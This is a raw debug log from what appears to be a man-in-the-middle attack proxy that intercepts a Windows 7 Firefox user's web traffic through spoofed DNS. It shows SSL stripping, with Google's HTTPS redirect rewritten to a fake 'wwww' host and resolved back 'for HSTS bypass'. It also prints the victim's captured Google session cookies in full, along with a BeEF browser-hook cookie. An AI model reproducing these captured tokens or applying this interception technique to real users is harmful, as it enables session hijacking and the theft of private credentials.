2016-02-16 14:45:07 ServerConnection Receiving header: (content-transfer-encoding: binary)
2016-02-16 14:45:07 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:07 ServerConnection Receiving header: (connection: keep-alive)
2016-02-16 14:45:07 ServerConnection Receiving header: (server: nginx/1.4.7)
2016-02-16 14:45:07 ServerConnection Receiving header: (last-modified: Mon, 15 Feb 2016 01:49:36 GMT)
2016-02-16 14:45:07 ServerConnection Receiving header: (host: gn.symcd.com)
2016-02-16 14:45:07 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:07 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:07 GMT)
2016-02-16 14:45:07 ServerConnection Receiving header: (content-type: application/ocsp-response)
2016-02-16 14:45:07 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:07 ServerConnection Read from server 1419 bytes of data
2016-02-16 14:45:07 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:07 ServerConnection Server response: HTTP/1.0 200 OK
2016-02-16 14:45:07 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:07 ServerConnection Receiving header: (content-transfer-encoding: binary)
2016-02-16 14:45:07 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:07 ServerConnection Receiving header: (connection: keep-alive)
2016-02-16 14:45:07 ServerConnection Receiving header: (server: nginx/1.4.7)
2016-02-16 14:45:07 ServerConnection Receiving header: (last-modified: Mon, 15 Feb 2016 01:49:36 GMT)
2016-02-16 14:45:07 ServerConnection Receiving header: (host: gn.symcd.com)
2016-02-16 14:45:07 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:07 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:07 GMT)
2016-02-16 14:45:07 ServerConnection Receiving header: (content-type: application/ocsp-response)
2016-02-16 14:45:07 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:07 ServerConnection Read from server 1419 bytes of data
2016-02-16 14:45:07 DNS Proxying the response of type 'A' for www.youtube.com
2016-02-16 14:45:07 DNS Proxying the response of type 'A' for www.amazon.com
2016-02-16 14:45:07 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:07 ServerConnection Server response: HTTP/1.0 200 OK
2016-02-16 14:45:07 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:07 ServerConnection Receiving header: (content-transfer-encoding: binary)
2016-02-16 14:45:07 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:07 ServerConnection Receiving header: (connection: keep-alive)
2016-02-16 14:45:07 ServerConnection Receiving header: (server: nginx/1.4.7)
2016-02-16 14:45:07 ServerConnection Receiving header: (last-modified: Mon, 15 Feb 2016 01:49:36 GMT)
2016-02-16 14:45:07 ServerConnection Receiving header: (host: gn.symcd.com)
2016-02-16 14:45:07 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:07 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:07 GMT)
2016-02-16 14:45:07 ServerConnection Receiving header: (content-type: application/ocsp-response)
2016-02-16 14:45:07 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:07 ServerConnection Read from server 1419 bytes of data
2016-02-16 14:45:07 DNS Proxying the response of type 'A' for www.amazon.com
2016-02-16 14:45:07 DNS Proxying the response of type 'A' for youtube-ui.l.google.com
2016-02-16 14:45:08 DNS Proxying the response of type 'AAAA' for youtube-ui.l.google.com
2016-02-16 14:45:08 DNS Proxying the response of type 'AAAA' for www.amazon.com
2016-02-16 14:45:08 DNS Proxying the response of type 'A' for clients1.google.com
2016-02-16 14:45:08 DNS Proxying the response of type 'A' for www.twitter.com
2016-02-16 14:45:08 DNS Proxying the response of type 'A' for www.wikipedia.org
2016-02-16 14:45:08 ClientRequest Resolving host: clients1.google.com
2016-02-16 14:45:08 URLMonitor Parsing host: clients1.google.com
2016-02-16 14:45:08 URLMonitor Host not in list: clients1.google.com
2016-02-16 14:45:08 ClientRequest Host not cached.
2016-02-16 14:45:08 ClientRequest Resolving with DNSChef
2016-02-16 14:45:08 DNS Proxying the response of type 'A' for clients1.google.com
2016-02-16 14:45:08 ClientRequest Resolved host successfully: clients1.google.com ->
2016-02-16 14:45:08 URLMonitor Parsing host: clients1.google.com
2016-02-16 14:45:08 URLMonitor Host not in list: clients1.google.com
2016-02-16 14:45:08 ClientRequest Modifing HOST header: clients1.google.com -> clients1.google.com
2016-02-16 14:45:08 ClientRequest Zapped encoding
2016-02-16 14:45:08 URLMonitor Parsing host: clients1.google.com
2016-02-16 14:45:08 URLMonitor Host not in list: clients1.google.com
2016-02-16 14:45:08 ClientRequest Sending request via HTTP
2016-02-16 14:45:08 ServerConnection HTTP connection made.
2016-02-16 14:45:08 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:08 ServerConnection Sending header: (content-length: 75)
2016-02-16 14:45:08 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:08 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:08 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:08 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:08 ServerConnection Sending header: (host: clients1.google.com)
2016-02-16 14:45:08 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:08 ServerConnection Sending header: (content-type: application/ocsp-request)
2016-02-16 14:45:09 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:09 ServerConnection Server response: HTTP/1.0 200 OK
2016-02-16 14:45:09 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:09 ServerConnection Receiving header: (x-xss-protection: 1; mode=block)
2016-02-16 14:45:09 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:09 ServerConnection Receiving header: (connection: Keep-Alive)
2016-02-16 14:45:09 ServerConnection Receiving header: (server: ocspresponder)
2016-02-16 14:45:09 ServerConnection Receiving header: (host: clients1.google.com)
2016-02-16 14:45:09 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:09 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:09 GMT)
2016-02-16 14:45:09 ServerConnection Receiving header: (x-frame-options: SAMEORIGIN)
2016-02-16 14:45:09 ServerConnection Receiving header: (content-type: application/ocsp-response)
2016-02-16 14:45:09 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:09 ServerConnection Read from server 463 bytes of data
2016-02-16 14:45:09 DNS Proxying the response of type 'AAAA' for vimeo.com
2016-02-16 14:45:09 ClientRequest Resolving host: weatherblink.wdgserv.com
2016-02-16 14:45:09 URLMonitor Parsing host: weatherblink.wdgserv.com
2016-02-16 14:45:09 URLMonitor Host not in list: weatherblink.wdgserv.com
2016-02-16 14:45:09 ClientRequest Host not cached.
2016-02-16 14:45:09 ClientRequest Resolving with DNSChef
2016-02-16 14:45:09 DNS Proxying the response of type 'A' for weatherblink.wdgserv.com
2016-02-16 14:45:09 DNS Proxying the response of type 'AAAA' for twitter.com
2016-02-16 14:45:09 DNS Proxying the response of type 'A' for www.anrdoezrs.net
2016-02-16 14:45:09 DNS Proxying the response of type 'A' for www.about.com
2016-02-16 14:45:09 ClientRequest Resolved host successfully: weatherblink.wdgserv.com ->
2016-02-16 14:45:09 URLMonitor Parsing host: weatherblink.wdgserv.com
2016-02-16 14:45:09 URLMonitor Host not in list: weatherblink.wdgserv.com
2016-02-16 14:45:09 ClientRequest Modifing HOST header: weatherblink.wdgserv.com -> weatherblink.wdgserv.com
2016-02-16 14:45:09 ClientRequest Zapped encoding
2016-02-16 14:45:09 URLMonitor Parsing host: weatherblink.wdgserv.com
2016-02-16 14:45:09 URLMonitor Host not in list: weatherblink.wdgserv.com
2016-02-16 14:45:09 ClientRequest Sending request via HTTP
2016-02-16 14:45:09 ClientRequest Resolving host: clients1.google.com
2016-02-16 14:45:09 URLMonitor Parsing host: clients1.google.com
2016-02-16 14:45:09 URLMonitor Host not in list: clients1.google.com
2016-02-16 14:45:09 ClientRequest Host cached: clients1.google.com
2016-02-16 14:45:09 ClientRequest Resolved host successfully: clients1.google.com ->
2016-02-16 14:45:09 URLMonitor Parsing host: clients1.google.com
2016-02-16 14:45:09 URLMonitor Host not in list: clients1.google.com
2016-02-16 14:45:09 ClientRequest Modifing HOST header: clients1.google.com -> clients1.google.com
2016-02-16 14:45:09 ClientRequest Zapped encoding
2016-02-16 14:45:09 URLMonitor Parsing host: clients1.google.com
2016-02-16 14:45:09 URLMonitor Host not in list: clients1.google.com
2016-02-16 14:45:09 ClientRequest Sending request via HTTP
2016-02-16 14:45:09 ServerConnection HTTP connection made.
2016-02-16 14:45:09 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:09 ServerConnection Sending header: (content-length: 75)
2016-02-16 14:45:09 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:09 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:09 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:09 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:09 ServerConnection Sending header: (host: clients1.google.com)
2016-02-16 14:45:09 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:09 ServerConnection Sending header: (content-type: application/ocsp-request)
2016-02-16 14:45:10 DNS Proxying the response of type 'AAAA' for e9343.a.akamaiedge.net
2016-02-16 14:45:10 DNS Proxying the response of type 'A' for www.google.com.np
2016-02-16 14:45:10 ServerConnection HTTP connection made.
2016-02-16 14:45:10 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:10 type:Firefox-43 os:Windows 7 weatherblink.wdgserv.com
2016-02-16 14:45:10 ServerConnection Full request: weatherblink.wdgserv.com/weatherblink/lookup/auto
2016-02-16 14:45:10 ServerConnection Sending header: (host: weatherblink.wdgserv.com)
2016-02-16 14:45:10 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:10 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:10 ServerConnection Sending header: (content-length: 0)
2016-02-16 14:45:10 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:10 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:10 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:10 DNS Proxying the response of type 'A' for www.instagram.com
2016-02-16 14:45:10 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:10 ServerConnection Server response: HTTP/1.0 200 OK
2016-02-16 14:45:10 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:10 ServerConnection Receiving header: (x-xss-protection: 1; mode=block)
2016-02-16 14:45:10 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:10 ServerConnection Receiving header: (connection: Keep-Alive)
2016-02-16 14:45:10 ServerConnection Receiving header: (server: ocspresponder)
2016-02-16 14:45:10 ServerConnection Receiving header: (host: clients1.google.com)
2016-02-16 14:45:10 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:10 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:10 GMT)
2016-02-16 14:45:10 ServerConnection Receiving header: (x-frame-options: SAMEORIGIN)
2016-02-16 14:45:10 ServerConnection Receiving header: (content-type: application/ocsp-response)
2016-02-16 14:45:10 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:10 ServerConnection Read from server 463 bytes of data
2016-02-16 14:45:10 DNS Could not proxy request: timed out
2016-02-16 14:45:10 DNS Proxying the response of type 'A' for instagram.c10r.facebook.com
2016-02-16 14:45:10 DNS Proxying the response of type 'AAAA' for instagram.c10r.facebook.com
2016-02-16 14:45:10 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:10 ServerConnection Server response: HTTP/1.1 200 OK
2016-02-16 14:45:10 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:10 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:10 ServerConnection Receiving header: (connection: close)
2016-02-16 14:45:10 ServerConnection Receiving header: (server: Apache)
2016-02-16 14:45:10 ServerConnection Receiving header: (host: weatherblink.wdgserv.com)
2016-02-16 14:45:10 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:10 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:10 GMT)
2016-02-16 14:45:10 ServerConnection Receiving header: (content-type: application/json;charset=UTF-8)
2016-02-16 14:45:11 ClientRequest Resolving host: www.google.com.np
2016-02-16 14:45:11 URLMonitor Parsing host: www.google.com.np
2016-02-16 14:45:11 URLMonitor Host not in list: www.google.com.np
2016-02-16 14:45:11 ClientRequest Host not cached.
2016-02-16 14:45:11 ClientRequest Resolving with DNSChef
2016-02-16 14:45:11 DNS Proxying the response of type 'A' for www.google.com.np
2016-02-16 14:45:11 ClientRequest Resolved host successfully: www.google.com.np ->
2016-02-16 14:45:11 URLMonitor Parsing host: www.google.com.np
2016-02-16 14:45:11 URLMonitor Host not in list: www.google.com.np
2016-02-16 14:45:11 ClientRequest Modifing HOST header: www.google.com.np -> www.google.com.np
2016-02-16 14:45:11 ClientRequest Zapped encoding
2016-02-16 14:45:11 URLMonitor Parsing host: www.google.com.np
2016-02-16 14:45:11 URLMonitor Host not in list: www.google.com.np
2016-02-16 14:45:11 ClientRequest Sending request via HTTP
2016-02-16 14:45:11 ServerConnection HTTP connection made.
2016-02-16 14:45:11 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:11 type:Firefox-43 os:Windows 7 www.google.com.np
2016-02-16 14:45:11 ServerConnection Full request: www.google.com.np/
2016-02-16 14:45:11 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:11 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:11 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:11 ServerConnection Sending header: (content-length: 0)
2016-02-16 14:45:11 ServerConnection Sending header: (cookie: NID=76=uyYCIDub0Nevaomh1L6SR7ACfEmUGWbtQ-oa75kmUudodJluwN6y6rv6MnSBiJmwrz3ELYjY0Na8xsVAe0QoGqr7kBIOua9XmYOztnYupecOmfAGR8-MIQ1m0C33IMglWlAodLEizOzkI9jFj2Z4FOwV3U8-HISZGSY4ugfRM1OkBDBGcvgSZ-8r3nf8blh1qwqugOK6UrrKRhKdYUs5h6cTFHiE01w3f7lwrkgyBwu1wYWQPo5l2YGbcO5cVZXyyz6GxSIGmGdQWYMJbZJWuwfWjNP8EJI3v4Xxs-OBNySevErRgWxaD2OhEaMAhMG1; SID=DQAAABwBAACmVNWSWoLXCb4cwMuk8fRHSaRLV09B-ajSzIgmMJdAvmpF7UdlzfC7VbvD46Y2M3PEICNgc-hw3J8kMLRRtVNM0Ko2ERB7qhLEQdnPrgs-QyqUNT8bNjKFssJhaqhjyUSMDeTmy-vOokIoNkKsgByvMIgzdm63ACyEygf4-f4qJuF2zgBq5G7Z8Fipmq4SQ2eZFLGTvNsO-o0PlUxAagVHiV0a-gIVkSz3jlwatBt7ba7muHjY2tqwEDfubB9f-Oh6EQM4ogIwpUgCtnc6Ii4FK3d0CkgOkgO9YSQwM5xvdqi7Z5ZmsQKz4owO7xkCJVGYgQA0zYsYy5UTCHYKwwNgelDJYk9VnVWe5Wuo1dzi9ffJzTyn92eK2Q; HSID=AiCrU79YExMkNX6Vi; SSID=AADWvatxGSip6RHCi; APISID=3dOjCQUwT-chLcg/Al7oMl4ZCZSUw8KM9; SAPISID=bV1rkb7EYbVwDRg1/ASyCrTbiUtF9TLU-; OGPC=5061821-13:; mindsparktb224179243=true; mindsparktbsupport224179243=true; mindsparkextensionapifeatures224179243=TOOLBARCLEANER; mindsparktb220280897=true; mindsparktbsupport220280897=true; mindsparkextensionapifeatures220280897=TOOLBARCLEANER; BEEFHOOK=fDrJIZ8uZylhOGmCttYNod0rwvI8EXXFlhGzmOfY7JNCZezd7xl4XqRsejqyBfjgeDKv4ICtp47d8VbX; mindsparktb224179243=true; mindsparktbsupport224179243=true; mindsparkextensionapifeatures224179243=TOOLBARCLEANER; mindsparktb220280897=true; mindsparktbsupport220280897=true; mindsparkextensionapifeatures220280897=TOOLBARCLEANER)
2016-02-16 14:45:11 ServerConnection Sending header: (host: www.google.com.np)
2016-02-16 14:45:11 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:11 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:11 DNS Proxying the response of type 'AAAA' for track.cj.akadns.net
2016-02-16 14:45:11 DNS Proxying the response of type 'AAAA' for dynwwwonly.about.com
2016-02-16 14:45:11 DNS Proxying the response of type 'AAAA' for a1230.b.akamai.net
2016-02-16 14:45:11 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:11 ServerConnection Server response: HTTP/1.0 302 Found
2016-02-16 14:45:11 ServerConnection Found secure reference: https://www.google.com.np/?gws_rd=ssl
2016-02-16 14:45:11 URLMonitor SSL host (www.google.com.np) tokenized (wwww.google.com.np)
2016-02-16 14:45:11 ServerConnection Replacing https://www.google.com.np/?gws_rd=ssl => http://wwww.google.com.np/?gws_rd=ssl
2016-02-16 14:45:11 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:11 ServerConnection Receiving header: (x-xss-protection: 1; mode=block)
2016-02-16 14:45:11 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:11 ServerConnection Receiving header: (connection: Keep-Alive)
2016-02-16 14:45:11 ServerConnection Receiving header: (server: gws)
2016-02-16 14:45:11 ServerConnection Receiving header: (host: www.google.com.np)
2016-02-16 14:45:11 ServerConnection Receiving header: (location: http://wwww.google.com.np/?gws_rd=ssl)
2016-02-16 14:45:11 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:11 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:11 GMT)
2016-02-16 14:45:11 ServerConnection Receiving header: (x-frame-options: SAMEORIGIN)
2016-02-16 14:45:11 ServerConnection Receiving header: (content-type: text/html; charset=UTF-8)
2016-02-16 14:45:11 ServerConnection Found secure reference: https://www.google.com.np/?gws_rd=ssl
2016-02-16 14:45:12 ServerConnection Replacing https://www.google.com.np/?gws_rd=ssl => http://wwww.google.com.np/?gws_rd=ssl
2016-02-16 14:45:12 DNS Proxying the response of type 'A' for support.mindspark.com
2016-02-16 14:45:12 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:12 ServerConnection Read from server 234 bytes of data
2016-02-16 14:45:12 DNS Resolving 'wwww.google.com.np' to 'www.google.com.np' for HSTS bypass
2016-02-16 14:45:12 DNS Proxying the response of type 'A' for about.ask.com
2016-02-16 14:45:12 DNS Proxying the response of type 'A' for eula.mindspark.com
2016-02-16 14:45:12 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:12 ServerConnection Read from server 1115 bytes of data
2016-02-16 14:45:12 DNS Proxying the response of type 'A' for www64.mindspark.com
2016-02-16 14:45:12 DNS Proxying the response of type 'A' for about.ask.com
2016-02-16 14:45:12 ClientRequest Resolving host: wwww.google.com.np
2016-02-16 14:45:12 URLMonitor Parsing host: wwww.google.com.np
2016-02-16 14:45:12 URLMonitor Found host in list: www.google.com.np
2016-02-16 14:45:12 ClientRequest Host cached: www.google.com.np
2016-02-16 14:45:12 ClientRequest Resolved host successfully: wwww.google.com.np ->
2016-02-16 14:45:12 URLMonitor Parsing host: wwww.google.com.np
2016-02-16 14:45:12 URLMonitor Found host in list: www.google.com.np
2016-02-16 14:45:12 ClientRequest Modifing HOST header: wwww.google.com.np -> www.google.com.np
2016-02-16 14:45:12 ClientRequest Zapped encoding
2016-02-16 14:45:12 URLMonitor Parsing host: wwww.google.com.np
2016-02-16 14:45:12 URLMonitor Found host in list: www.google.com.np
2016-02-16 14:45:12 ClientRequest Sending request via SSL/TLS: http://www.google.com.np/?gws_rd=ssl
2016-02-16 14:45:12 DNS Proxying the response of type 'AAAA' for www64.mindspark.com
2016-02-16 14:45:12 DNS Proxying the response of type 'A' for a1170.b.akamai.net
2016-02-16 14:45:12 ServerConnection HTTP connection made.
2016-02-16 14:45:12 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:12 type:Firefox-43 os:Windows 7 www.google.com.np
2016-02-16 14:45:12 ServerConnection Full request: www.google.com.np/?gws_rd=ssl
2016-02-16 14:45:12 ServerConnection Sending header: (connection: keep-alive)
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